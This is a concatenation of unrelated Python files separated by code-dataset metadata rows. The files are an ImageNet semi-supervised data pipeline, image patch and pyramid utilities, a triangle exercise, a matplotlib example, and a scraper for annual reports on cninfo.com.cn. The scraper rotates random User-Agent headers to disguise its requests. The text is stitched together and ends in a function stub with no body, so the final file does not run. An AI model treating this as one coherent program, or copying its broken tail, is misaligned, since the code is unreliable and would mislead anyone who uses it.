Returns:
A random crop of the supplied image.
"""
bbox = tf.constant([0.0, 0.0, 1.0, 1.0], dtype=tf.float32, shape=[1, 1, 4])
sample_distorted_bounding_box = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=bbox,
min_object_covered=min_object_covered,
aspect_ratio_range=aspect_ratio_range,
area_range=area_range,
max_attempts=max_attempts,
use_image_if_no_bounding_boxes=True)
bbox_begin, bbox_size, _ = sample_distorted_bounding_box
offset_y, offset_x, _ = tf.unstack(bbox_begin)
target_height, target_width, _ = tf.unstack(bbox_size)
crop = tf.image.crop_to_bounding_box(image, offset_y, offset_x,
target_height, target_width)
return crop
def center_crop(image, image_size, crop_padding=32):
"""Crop an image in the center while preserving aspect ratio.
Args:
image: The image to be cropped.
image_size: the desired crop size.
crop_padding: minimal distance of the crop from the edge of the image.
Returns:
The center crop of the provided image.
"""
shape = tf.shape(image)
image_height = shape[0]
image_width = shape[1]
padded_center_crop_size = tf.cast(
((image_size / (image_size + crop_padding)) *
tf.cast(tf.minimum(image_height, image_width), tf.float32)),
tf.int32)
offset_height = ((image_height - padded_center_crop_size) + 1) // 2
offset_width = ((image_width - padded_center_crop_size) + 1) // 2
crop = tf.image.crop_to_bounding_box(image, offset_height, offset_width,
padded_center_crop_size,
padded_center_crop_size)
return crop
def colour_jitter(image, greyscale_prob=0.0):
"""Colour jitter augmentation.
Args:
image: The image to be augmented
greyscale_prob: probability of greyscale conversion
Returns:
Augmented image
"""
# Make sure it has 3 channels so random_saturation and random_hue don't
# fail on greyscale images
image = image * tf.ones([1, 1, 3], dtype=image.dtype)
if greyscale_prob > 0.0:
def f_grey():
return tf.image.rgb_to_grayscale(image)
def f_colour():
image_col = tf.image.random_saturation(image, 0.7, 1.4)
image_col = tf.image.random_hue(image_col, 0.1)
return image_col
p = tf.random.uniform([1])
image = tf.cond(tf.less(p[0], greyscale_prob), f_grey, f_colour)
else:
image = tf.image.random_saturation(image, 0.7, 1.4)
image = tf.image.random_hue(image, 0.1)
image = tf.image.random_contrast(image, 0.7, 1.4)
image = tf.image.random_brightness(image, 0.4)
return image
def preprocess_train_image(image, apply_colour_jitter=False,
greyscale_prob=0.0, image_size=224):
"""Preprocess a raw ImageNet image for training or evaluation.
Args:
image: The image to be preprocessed.
apply_colour_jitter: If True, apply colour jitterring.
greyscale_prob: Probability of converting image to greyscale.
image_size: The target size of the image.
Returns:
The pre-processed image.
"""
image = random_crop(image)
image = tf.image.resize([image],
[image_size, image_size],
method=tf.image.ResizeMethod.BICUBIC
)[0]
# Randomly flip the image horizontally.
image = tf.image.random_flip_left_right(image)
if apply_colour_jitter:
image = colour_jitter(image, greyscale_prob=greyscale_prob)
image = normalize_image(image)
return image
def preprocess_eval_image(image, image_size=224):
"""Preprocess a raw ImageNet image for training or evaluation.
Args:
image: The image to be preprocessed.
image_size: The target size of the image.
Returns:
The pre-processed image.
"""
image = center_crop(image, image_size)
image = tf.image.resize([image],
[image_size, image_size],
method=tf.image.ResizeMethod.BICUBIC
)[0]
image = normalize_image(image)
return image
_JPEG_ENCODED_FEATURE_DESCRIPTION = {
'label': tf.io.FixedLenFeature([], tf.int64, default_value=0),
'image': tf.io.FixedLenFeature([], tf.string),
'file_name': tf.io.FixedLenFeature([], tf.string),
}
def _filter_tfds_by_file_name(in_ds, subset_filenames):
kv_init = tf.lookup.KeyValueTensorInitializer(
np.array(subset_filenames), np.ones((len(subset_filenames),), dtype=int),
key_dtype=tf.string, value_dtype=tf.int64)
ht = tf.lookup.StaticHashTable(kv_init, 0)
def pred_fn(x):
return tf.equal(ht.lookup(x['file_name']), 1)
return in_ds.filter(pred_fn)
def _deserialize_and_decode_jpeg(serialized_sample):
sample = tf.io.parse_single_example(serialized_sample,
_JPEG_ENCODED_FEATURE_DESCRIPTION)
sample['image'] = tf.io.decode_jpeg(sample['image'])
return sample
def _deserialize_sample(serialized_sample):
return tf.io.parse_example(serialized_sample,
_JPEG_ENCODED_FEATURE_DESCRIPTION)
def _decode_jpeg(sample):
image = tf.io.decode_jpeg(sample['image'])
return dict(label=sample['label'], file_name=sample['file_name'], image=image)
def deserialize_and_decode_image_dataset(ds, batch_size):
if batch_size is not None and batch_size > 1:
return ds.batch(batch_size).map(
_deserialize_sample,
num_parallel_calls=tf.data.experimental.AUTOTUNE).unbatch().map(
_decode_jpeg, num_parallel_calls=tf.data.experimental.AUTOTUNE)
else:
return ds.map(_deserialize_and_decode_jpeg,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
def _load_tfds_imagenet(split_name, n_total):
"""Load ImageNet from TFDS."""
split_size = float(n_total) // jax.host_count()
start = split_size * jax.host_id()
end = start + split_size
start_index = int(round(start))
end_index = int(round(end))
split = '{}[{}:{}]'.format(split_name, start_index, end_index)
return tfds.load('imagenet2012:5.*.*', split=split)
def _load_custom_imagenet_split(split_path):
"""Load a custom split of the ImageNet dataset."""
if not tf.io.gfile.exists(split_path):
raise RuntimeError('Cannot find {}'.format(split_path))
shard_filenames = tf.io.gfile.listdir(split_path)
shard_filenames.sort()
if jax.host_count() > 1:
n_hosts = jax.host_count()
host_id = jax.host_id()
shard_filenames = [f for i, f in enumerate(shard_filenames)
if (i % n_hosts) == host_id]
files_in_split = [os.path.join(split_path, f) for f in shard_filenames]
ds = tf.data.TFRecordDataset(files_in_split, buffer_size=128 * 1024 * 1024,
num_parallel_reads=len(files_in_split))
# ds = deserialize_and_decode_image_dataset(ds, batch_size=256)
ds = deserialize_and_decode_image_dataset(ds, batch_size=1)
return ds
_SUP_PATH_PAT = r'{imagenet_subset_dir}/imagenet_{n_sup}_seed{subset_seed}'
_VAL_TVSPLIT_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_split.pkl'
_VAL_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_val'
_VAL_SUP_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_{n_sup}_seed{subset_seed}'
class ImageNetDataSource(object):
"""ImageNet data source.
Attributes:
n_train: number of training samples
n_sup: number of supervised samples
n_val: number of validation samples
n_test: number of test samples
train_semisup_ds: Semi-supervised training dataset
train_unsup_ds: Unsupervised training dataset
train_sup_ds: Supervised training dataset
val_ds: Validation dataset
test_ds: Test dataset
n_classes: Number of classes
"""
def __init__(self, imagenet_subset_dir, n_val, n_sup, train_batch_size,
eval_batch_size, augment_twice, apply_colour_jitter=False,
greyscale_prob=0.0, load_test_set=True, image_size=224,
subset_seed=12345, val_seed=131):
if n_val == 0:
      # We are using the complete ImageNet training set for training
# No samples are being held out for validation
# Draw unsupervised samples from complete training set
train_unsup_ds = _load_tfds_imagenet('train', TRAIN_IMAGES)
self.n_train = TRAIN_IMAGES
if n_sup == -1 or n_sup == TRAIN_IMAGES:
# All training samples are supervised
train_sup_ds = train_unsup_ds
self.n_sup = TRAIN_IMAGES
else:
sup_path = _SUP_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_sup=n_sup,
subset_seed=subset_seed)
train_sup_ds = _load_custom_imagenet_split(sup_path)
self.n_sup = n_sup
val_ds = None
self.n_val = 0
else:
# A validation set has been requested
# Load the pickle file that tells us which file names are train / val
tvsplit_path = _VAL_TVSPLIT_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_val=n_val,
val_seed=val_seed)
with tf.io.gfile.GFile(tvsplit_path, 'rb') as f_tvsplit:
tvsplit = pickle.load(f_tvsplit)
train_fn = tvsplit['train_fn']
# Filter the dataset to select samples in the training set
trainval_ds = _load_tfds_imagenet('train', TRAIN_IMAGES)
train_unsup_ds = _filter_tfds_by_file_name(trainval_ds, train_fn)
self.n_train = len(train_fn)
# Load the validation set from a custom dataset
val_path = _VAL_PATH_PAT.format(imagenet_subset_dir=imagenet_subset_dir,
n_val=n_val,
val_seed=val_seed)
val_ds = _load_custom_imagenet_split(val_path)
self.n_val = n_val
if n_sup == -1 or n_sup == len(train_fn):
# All training samples are supervised
train_sup_ds = train_unsup_ds
self.n_sup = len(train_fn)
else:
sup_path = _VAL_SUP_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_val=n_val,
val_seed=val_seed, n_sup=n_sup,
subset_seed=subset_seed)
train_sup_ds = _load_custom_imagenet_split(sup_path)
self.n_sup = n_sup
train_sup_ds = train_sup_ds.repeat()
train_sup_ds = train_sup_ds.shuffle(8 * train_batch_size)
train_unsup_ds = train_unsup_ds.repeat()
train_unsup_ds = train_unsup_ds.shuffle(8 * train_batch_size)
train_semisup_ds = tf.data.Dataset.zip((train_sup_ds, train_unsup_ds))
def _augment_sup(sup_sample):
"""Augment supervised sample."""
sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
}
return sample
def _augment_unsup_once(unsup_sample):
"""Augment unsupervised sample, single augmentation."""
unsup_x0 = preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size)
sample = {
'unsup_image0': unsup_x0,
'unsup_image1': unsup_x0,
}
return sample
def _augment_unsup_twice(unsup_sample):
"""Augment unsupervised sample, two augmentations."""
sample = {
'unsup_image0': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'unsup_image1': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
}
return sample
def _augment_semisup_once(sup_sample, unsup_sample):
"""Augment semi-supervised sample, single augmentation."""
unsup_x0 = preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size)
semisup_sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
'unsup_image0': unsup_x0,
'unsup_image1': unsup_x0,
}
return semisup_sample
def _augment_semisup_twice(sup_sample, unsup_sample):
"""Augment semi-supervised sample, two augmentations."""
semisup_sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
'unsup_image0': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'unsup_image1': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
}
return semisup_sample
def _process_eval_sample(x):
"""Pre-process evaluation sample."""
image = preprocess_eval_image(x['image'], image_size=image_size)
batch = {'image': image, 'label': x['label']}
return batch
if augment_twice:
train_semisup_ds = train_semisup_ds.map(_augment_semisup_twice,
num_parallel_calls=128)
train_unsup_only_ds = train_unsup_ds.map(_augment_unsup_twice,
num_parallel_calls=128)
else:
train_semisup_ds = train_semisup_ds.map(_augment_semisup_once,
num_parallel_calls=128)
train_unsup_only_ds = train_unsup_ds.map(_augment_unsup_once,
num_parallel_calls=128)
train_sup_only_ds = train_sup_ds.map(_augment_sup,
num_parallel_calls=128)
train_semisup_ds = train_semisup_ds.batch(train_batch_size,
drop_remainder=True)
train_unsup_only_ds = train_unsup_only_ds.batch(train_batch_size,
drop_remainder=True)
train_sup_only_ds = train_sup_only_ds.batch(train_batch_size,
drop_remainder=True)
train_semisup_ds = train_semisup_ds.prefetch(10)
train_unsup_only_ds = train_unsup_only_ds.prefetch(10)
train_sup_only_ds = train_sup_only_ds.prefetch(10)
self.train_semisup_ds = train_semisup_ds
self.train_unsup_ds = train_unsup_only_ds
self.train_sup_ds = train_sup_only_ds
#
# Validation set
#
if n_val > 0:
val_ds = val_ds.cache()
val_ds = val_ds.map(_process_eval_sample, num_parallel_calls=128)
val_ds = val_ds.batch(eval_batch_size)
val_ds = val_ds.repeat()
val_ds = val_ds.prefetch(10)
self.val_ds = val_ds
else:
self.val_ds = None
if load_test_set:
#
# Test set
#
test_ds = _load_tfds_imagenet('validation', TEST_IMAGES)
test_ds = test_ds.cache()
test_ds = test_ds.map(_process_eval_sample, num_parallel_calls=128)
test_ds = test_ds.batch(eval_batch_size)
test_ds = test_ds.repeat()
test_ds = test_ds.prefetch(10)
self.test_ds = test_ds
self.n_test = TEST_IMAGES
else:
self.test_ds = None
self.n_test = 0
self.n_classes = 1000
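# Illustrative sketch (not part of the original file): constructing the data source and
# pulling one semi-supervised batch. The subset directory is a placeholder and any custom
# split files it references must already exist on disk.
def _example_build_data_source():
  data_source = ImageNetDataSource(
      imagenet_subset_dir='/path/to/imagenet_subsets',  # placeholder path
      n_val=0, n_sup=-1,
      train_batch_size=64, eval_batch_size=250,
      augment_twice=True, load_test_set=False)
  batch = next(iter(data_source.train_semisup_ds))
  return batch['sup_image'].shape  # expected (64, 224, 224, 3) given the preprocessing above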
| 36.75625
| 100
| 0.677719
| 8,467
| 0.479907
| 0
| 0
| 0
| 0
| 0
| 0
| 4,472
| 0.253472
|
a2397ee156e882b19d6dbf902268121905eaf802
| 4,293
|
py
|
Python
|
utils/image.py
|
ariel415el/Efficient-GPNN
|
05f6588c3cc920e810d71fc9ed001f8915d7fc8a
|
[
"Apache-2.0"
] | 7
|
2021-11-11T22:57:14.000Z
|
2022-03-23T08:47:00.000Z
|
utils/image.py
|
ariel415el/Efficient-GPNN
|
05f6588c3cc920e810d71fc9ed001f8915d7fc8a
|
[
"Apache-2.0"
] | null | null | null |
utils/image.py
|
ariel415el/Efficient-GPNN
|
05f6588c3cc920e810d71fc9ed001f8915d7fc8a
|
[
"Apache-2.0"
] | 4
|
2021-11-18T07:24:09.000Z
|
2022-03-26T22:35:05.000Z
|
import os
import cv2
import torch
from torch.nn import functional as F
from torchvision import transforms
import torchvision.utils
def save_image(img, path):
os.makedirs(os.path.dirname(path), exist_ok=True)
torchvision.utils.save_image(torch.clip(img, -1, 1), path, normalize=True)
def cv2pt(img):
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img / 255.
img = img * 2 - 1
img = torch.from_numpy(img.transpose(2, 0, 1)).float()
return img
def aspect_ratio_resize(img, max_dim=256):
h, w, c = img.shape
if max(h, w) / max_dim > 1:
img = cv2.blur(img, ksize=(5, 5))
if w > h:
h = int(h/w*max_dim)
w = max_dim
else:
w = int(w/h*max_dim)
h = max_dim
return cv2.resize(img, (w, h), interpolation=cv2.INTER_AREA)
def downscale(img, pyr_factor):
assert 0 < pyr_factor < 1
new_w = int(pyr_factor * img.shape[-1])
new_h = int(pyr_factor * img.shape[-2])
return transforms.Resize((new_h, new_w), antialias=True)(img)
def blur(img, pyr_factor):
"""Blur image by downscaling and then upscaling it back to original size"""
if pyr_factor < 1:
d_img = downscale(img, pyr_factor)
img = transforms.Resize(img.shape[-2:], antialias=True)(d_img)
return img
def get_pyramid(img, min_height, pyr_factor):
res = [img]
while True:
img = downscale(img, pyr_factor)
if img.shape[-2] < min_height:
break
res = [img] + res
# ensure smallest size is of min_height
if res[0].shape[-2] != min_height:
new_width = int(min_height * res[0].shape[-1] / float(res[0].shape[-2]))
res[0] = transforms.Resize((min_height, new_width), antialias=True)(res[0])
res = [x.unsqueeze(0) for x in res]
return res
def match_image_sizes(input, target):
"""resize and crop input image so that it has the same aspect ratio as target"""
assert(len(input.shape) == len(target.shape) and len(target.shape) == 4)
input_h, input_w = input.shape[-2:]
target_h, target_w = target.shape[-2:]
input_scale_factor = input_h / input_w
target_scale_factor = target_h / target_w
if target_scale_factor > input_scale_factor:
input = transforms.Resize((target_h, int(input_w/input_h*target_h)), antialias=True)(input)
pixels_to_cut = input.shape[-1] - target_w
if pixels_to_cut > 0:
input = input[:, :, :, int(pixels_to_cut / 2):-int(pixels_to_cut / 2)]
else:
input = transforms.Resize((int(input_h/input_w*target_w), target_w), antialias=True)(input)
pixels_to_cut = input.shape[-2] - target_h
if pixels_to_cut > 1:
input = input[:, :, int(pixels_to_cut / 2):-int(pixels_to_cut / 2)]
input = transforms.Resize(target.shape[-2:], antialias=True)(input)
return input
def extract_patches(src_img, patch_size, stride):
"""
    Splits the image into overlapping patches and returns a pytorch tensor of size (N_patches, 3*patch_size**2)
"""
channels = 3
patches = F.unfold(src_img, kernel_size=patch_size, dilation=(1, 1), stride=stride, padding=(0, 0)) # shape (b, 3*p*p, N_patches)
patches = patches.squeeze(dim=0).permute((1, 0)).reshape(-1, channels * patch_size**2)
return patches
def combine_patches(patches, patch_size, stride, img_shape):
"""
Combines patches into an image by averaging overlapping pixels
:param patches: patches to be combined. pytorch tensor of shape (N_patches, 3*patch_size**2)
    :param img_shape: shape of an image that, when split into patches with the given stride and patch_size,
    yields the same number of patches N_patches
returns an image of shape img_shape
"""
patches = patches.permute(1,0).unsqueeze(0)
combined = F.fold(patches, output_size=img_shape[-2:], kernel_size=patch_size, stride=stride)
    # normalisation: fold a tensor of ones to count how many patches overlap each output pixel
input_ones = torch.ones(img_shape, dtype=patches.dtype, device=patches.device)
divisor = F.unfold(input_ones, kernel_size=patch_size, dilation=(1, 1), stride=stride, padding=(0, 0))
divisor = F.fold(divisor, output_size=img_shape[-2:], kernel_size=patch_size, stride=stride)
divisor[divisor == 0] = 1.0
return (combined / divisor).squeeze(dim=0).unsqueeze(0)
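# Illustrative round-trip sketch (not part of the original file): extracting patches and
# recombining them should reproduce the input image, since overlaps are averaged out.
def _example_patch_round_trip():
    img = torch.rand(1, 3, 64, 64)
    patches = extract_patches(img, patch_size=8, stride=4)
    recombined = combine_patches(patches, patch_size=8, stride=4, img_shape=img.shape)
    return torch.allclose(img, recombined, atol=1e-6)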
| 35.775
| 133
| 0.663406
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 754
| 0.175635
|
a23aa98e817822c0db3ba0e76ac9fe51cc297075
| 486
|
py
|
Python
|
Exercism/triangle/triangle.py
|
adityaarakeri/Interview-solved
|
e924011d101621c7121f4f86d82bee089f4c1e25
|
[
"MIT"
] | 46
|
2019-10-14T01:21:35.000Z
|
2022-01-08T23:55:15.000Z
|
Exercism/triangle/triangle.py
|
Siddhant-K-code/Interview-solved
|
e924011d101621c7121f4f86d82bee089f4c1e25
|
[
"MIT"
] | 53
|
2019-10-03T17:16:43.000Z
|
2020-12-08T12:48:19.000Z
|
Exercism/triangle/triangle.py
|
Siddhant-K-code/Interview-solved
|
e924011d101621c7121f4f86d82bee089f4c1e25
|
[
"MIT"
] | 96
|
2019-10-03T18:12:10.000Z
|
2021-03-14T19:41:06.000Z
|
def is_triangle(func):
def wrapped(sides):
if any(i <= 0 for i in sides):
return False
sum_ = sum(sides)
if any(sides[i] > sum_ - sides[i] for i in range(3)):
return False
return func(sides)
return wrapped
@is_triangle
def is_equilateral(sides):
return len(set(sides)) == 1
@is_triangle
def is_isosceles(sides):
return len(set(sides)) != 3
@is_triangle
def is_scalene(sides):
return len(set(sides)) == 3
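# Illustrative checks (not part of the exercise solution): the decorator rejects
# non-positive sides and triangle-inequality violations before the specific test runs.
def _example_checks():
    assert is_equilateral([2, 2, 2])
    assert is_isosceles([3, 3, 4])
    assert not is_scalene([1, 2, 10])      # violates the triangle inequality
    assert not is_equilateral([0, 0, 0])   # non-positive sides are rejected up front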
| 19.44
| 61
| 0.602881
| 0
| 0
| 0
| 0
| 207
| 0.425926
| 0
| 0
| 0
| 0
|
a23daef3bb54fa9c84f160a660ef817f0e87362d
| 499
|
py
|
Python
|
docs/user/visualization/matplotlib/pythonstyle.py
|
joelfrederico/mytools
|
7bf57c49c7dde0a8b0aa337fbd2fbd527ce7a67f
|
[
"MIT"
] | 1
|
2021-03-31T23:27:09.000Z
|
2021-03-31T23:27:09.000Z
|
docs/user/visualization/matplotlib/pythonstyle.py
|
joelfrederico/mytools
|
7bf57c49c7dde0a8b0aa337fbd2fbd527ce7a67f
|
[
"MIT"
] | null | null | null |
docs/user/visualization/matplotlib/pythonstyle.py
|
joelfrederico/mytools
|
7bf57c49c7dde0a8b0aa337fbd2fbd527ce7a67f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import numpy as np
# Create data to plot
x = np.linspace(0, 10, 100)
y1 = np.sin(x)
y2 = np.cos(x)
# Create a grid
gs = gridspec.GridSpec(1, 2)
# Create a figure
fig = plt.figure(figsize=(16, 6))
# Create axes
ax1 = fig.add_subplot(gs[0, 0])
ax2 = fig.add_subplot(gs[0, 1])
# Plot data
ax1.plot(x, y1)
ax2.plot(x, y2)
# Rearrange figure to use all space
fig.tight_layout()
# Show figure
plt.show()
| 16.633333
| 38
| 0.695391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 147
| 0.294589
|
a23e0e43898b8301125178c7c69d4cccc505d6ca
| 21,583
|
py
|
Python
|
StockAnalysisSystem/ui/Extension/recycled/announcement_downloader.py
|
SleepySoft/StockAnalysisSystem
|
75f95738831614f7946f85d09118e447f7ac6dc7
|
[
"Apache-2.0"
] | 138
|
2018-01-03T03:32:49.000Z
|
2022-03-12T02:57:46.000Z
|
StockAnalysisSystem/ui/Extension/recycled/announcement_downloader.py
|
SleepySoft/StockAnalysisSystem
|
75f95738831614f7946f85d09118e447f7ac6dc7
|
[
"Apache-2.0"
] | 9
|
2018-01-01T03:16:24.000Z
|
2021-05-27T09:57:24.000Z
|
StockAnalysisSystem/ui/Extension/recycled/announcement_downloader.py
|
SleepySoft/StockAnalysisSystem
|
75f95738831614f7946f85d09118e447f7ac6dc7
|
[
"Apache-2.0"
] | 50
|
2019-08-05T01:02:30.000Z
|
2022-03-07T00:52:14.000Z
|
import time
import urllib
import random
import logging
import requests
import datetime
import traceback
from os import sys, path, makedirs
from PyQt5.QtCore import Qt, QTimer, QDateTime
from PyQt5.QtWidgets import QWidget, QPushButton, QVBoxLayout, QLabel, QComboBox, QDateTimeEdit, QCheckBox, QLineEdit, \
QRadioButton
root_path = path.dirname(path.dirname(path.abspath(__file__)))
from StockAnalysisSystem.core.Utility.common import *
from StockAnalysisSystem.core.Utility.ui_utility import *
from StockAnalysisSystem.core.Utility.task_queue import *
from StockAnalysisSystem.core.Utility.time_utility import *
from StockAnalysisSystem.ui.Utility.ui_context import UiContext
from StockAnalysisSystem.interface.interface import SasInterface as sasIF
from StockAnalysisSystem.core.Utility.securities_selector import SecuritiesSelector
# 20200217: It doesn't work anymore - Move to recycled
# -------------------------------------------- class AnnouncementDownloader --------------------------------------------
# -----------------------------------------------------------
# Get code from : https://github.com/gaodechen/cninfo_process
# -----------------------------------------------------------
User_Agent = [
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0"
]
headers = {'Accept': 'application/json, text/javascript, */*; q=0.01',
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-HK;q=0.6,zh-TW;q=0.5",
'Host': 'www.cninfo.com.cn',
'Origin': 'http://www.cninfo.com.cn',
'Referer': 'http://www.cninfo.com.cn/new/commonUrl?url=disclosure/list/notice',
'X-Requested-With': 'XMLHttpRequest'
}
class AnnouncementDownloader:
def __init__(self):
pass
@staticmethod
def format_query_time_range(time_range: any) -> str:
if time_range is None:
return AnnouncementDownloader.format_query_time_range((years_ago(3), now()))
if isinstance(time_range, str):
return time_range
if isinstance(time_range, datetime.datetime):
return AnnouncementDownloader.format_query_time_range((time_range, time_range))
if not isinstance(time_range, (tuple, list)):
return AnnouncementDownloader.format_query_time_range(None)
if len(time_range) == 0:
return AnnouncementDownloader.format_query_time_range(None)
if len(time_range) == 1:
return AnnouncementDownloader.format_query_time_range((time_range[0], time_range[0]))
since = time_range[0]
until = time_range[1]
return '%s+~+%s' % (since.strftime('%Y-%m-%d'), until.strftime('%Y-%m-%d'))
@staticmethod
def get_szse_annual_report_pages(page: int, stock: str, time_range: any = None):
query_path = 'http://www.cninfo.com.cn/new/hisAnnouncement/query'
        headers['User-Agent'] = random.choice(User_Agent)  # pick a User-Agent at random
time_range = AnnouncementDownloader.format_query_time_range(time_range)
        query = {'pageNum': page,  # page number
'pageSize': 30,
'tabName': 'fulltext',
                 'column': 'szse',  # Shenzhen Stock Exchange
'stock': stock,
'searchkey': '',
'secid': '',
'plate': 'sz',
                 'category': 'category_ndbg_szsh;',  # annual reports
'trade': '',
'seDate': time_range,
}
namelist = requests.post(query_path, headers=headers, data=query)
return namelist.json()['announcements']
@staticmethod
def get_sse_annual_report_pages(page: int, stock: str, time_range: any = None):
query_path = 'http://www.cninfo.com.cn/new/hisAnnouncement/query'
        headers['User-Agent'] = random.choice(User_Agent)  # pick a User-Agent at random
time_range = AnnouncementDownloader.format_query_time_range(time_range)
        query = {'pageNum': page,  # page number
'pageSize': 30,
'tabName': 'fulltext',
'column': 'sse',
'stock': stock,
'searchkey': '',
'secid': '',
'plate': 'sh',
                 'category': 'category_ndbg_szsh;',  # annual reports
'trade': '',
'seDate': time_range
}
namelist = requests.post(query_path, headers=headers, data=query)
        return namelist.json()['announcements']  # annual report entries in the JSON response
@staticmethod
def execute_download(report_pages, include_filter: [str] or None = None,
exclude_filter: [str] or None = None, quit_flag: [bool] = None):
if report_pages is None:
return
# download_headers = {
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-HK;q=0.6,zh-TW;q=0.5',
# 'Host': 'www.cninfo.com.cn',
# 'Origin': 'http://www.cninfo.com.cn'
# }
# download_headers['User-Agent'] = random.choice(User_Agent)
download_path = 'http://static.cninfo.com.cn/'
for page in report_pages:
if quit_flag is not None and quit_flag[0]:
break
title = page['announcementTitle']
allowed = AnnouncementDownloader.check_filter_allowed(title, include_filter, exclude_filter)
if not allowed:
print(' %s -> Ignore' % title)
continue
print(' %s -> Download' % title)
download = download_path + page["adjunctUrl"]
file_name = AnnouncementDownloader.format_download_path(page)
if '*' in file_name:
file_name = file_name.replace('*', '')
time.sleep(random.random() * 5)
r = requests.get(download)
f = open(file_name, "wb")
f.write(r.content)
f.close()
@staticmethod
def format_download_path(page) -> str:
file_name = page['secName'] + '_' + page['announcementTitle'] + '.pdf'
file_path = path.join(root_path, 'Download', 'report', page['secCode'])
makedirs(file_path, exist_ok=True)
return path.join(file_path, file_name)
@staticmethod
def check_filter_allowed(text: str, include_filter: [str] or None, exclude_filter: [str] or None) -> bool:
allowed = False
if include_filter is not None and len(include_filter) > 0:
for inc in include_filter:
if inc in text:
allowed = True
break
else:
allowed = True
if exclude_filter is not None and len(exclude_filter) > 0:
for exc in exclude_filter:
if exc in text:
allowed = False
break
return allowed
# ----------------------------------------- Interface -----------------------------------------
@staticmethod
def download_annual_report(stock_identity: str or list, time_range: any = None, quit_flag: [bool] = None):
if not isinstance(stock_identity, (list, tuple)):
stock_identity = [stock_identity]
for identity in stock_identity:
s, f = AnnouncementDownloader.__detect_stock_code_and_page_entry(identity)
AnnouncementDownloader.__download_report_for_securities(s, f, time_range, quit_flag)
@staticmethod
def __detect_stock_code_and_page_entry(stock_identity: str) -> tuple:
if stock_identity.endswith('.SSE'):
s = stock_identity[: -4]
f = AnnouncementDownloader.get_sse_annual_report_pages
elif stock_identity.endswith('.SZSE'):
s = stock_identity[: -5]
f = AnnouncementDownloader.get_szse_annual_report_pages
else:
s = stock_identity
exchange = get_stock_exchange(stock_identity)
if exchange == 'SSE':
f = AnnouncementDownloader.get_sse_annual_report_pages
elif exchange == 'SZSE':
f = AnnouncementDownloader.get_szse_annual_report_pages
else:
f = AnnouncementDownloader.get_sse_annual_report_pages
return s, f
@staticmethod
def __download_report_for_securities(s, f, time_range, quit_flag):
page = 1
while page < 1000: # Max limit
if quit_flag is not None and quit_flag[0]:
break
try:
print('Downloading report for %s, page %s' % (s, page))
page_data = f(page, s, time_range)
if len(page_data) == 0:
break
AnnouncementDownloader.execute_download(page_data,
include_filter=['年年度报告'],
exclude_filter=['确认意见', '摘要', '已取消'],
quit_flag=quit_flag)
if len(page_data) != 30:
break
except Exception as e:
print(e)
print('Maybe page reaches end.')
break
finally:
page += 1
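# Illustrative sketch (not part of the original module): downloading annual reports for one
# security over roughly the last three years. The stock identity is a placeholder; years_ago()
# and now() are assumed to come from the time_utility star import used above.
def _example_download():
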